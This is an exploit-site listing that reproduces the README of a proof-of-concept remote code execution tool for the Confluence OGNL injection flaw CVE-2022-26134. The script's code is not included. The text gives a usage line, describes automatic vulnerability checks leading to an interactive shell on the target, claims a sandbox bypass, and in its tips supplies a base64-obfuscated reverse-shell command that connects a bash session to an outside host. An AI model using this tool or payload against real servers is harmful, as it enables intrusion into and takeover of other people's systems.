Exploit for Expression Language Injection in Atlassian Confluence Data Center CVE-2022-26134

Name: Exploit for Expression Language Injection in Atlassian Confluence Data Center CVE-2022-26134
Rating: 5 (236 reviews)

2022-06-04 | CVSS 7.5

## https://sploitus.com/exploit?id=EA88FA45-8CE7-5D7D-8E6C-B04F8392F7EB
# CVE-2022-26134
Confluence OGNL expression injected RCE(CVE-2022-26134) poc and exp

## Update
Add sandbox bypass, high version supported.

# Usage
```
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/
```

The script will auto check target is vulnerable, and enter a pseudo-interactive shell if it's vulnerable.

Test under linux：  
![linux](https://raw.githubusercontent.com/SNCKER/CVE-2022-26134/master/linux.jpg)

Test under windows：  
![windows](https://raw.githubusercontent.com/SNCKER/CVE-2022-26134/master/windows.jpg)

Just input 'q' when you want to quit.

# Some tips
Command parameters are directly passed to the runtime.exec method, which does not have the context of the shell.  
so.  
Under Windows, some commands such as `dir` cannot be executed directly, you can use `cmd.exe /c dir`.  
Under linux, some special symbols cannot take effect, If you need to execute some command with special symbols like reverse shell, you can base64 encode it and then use `bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i}`.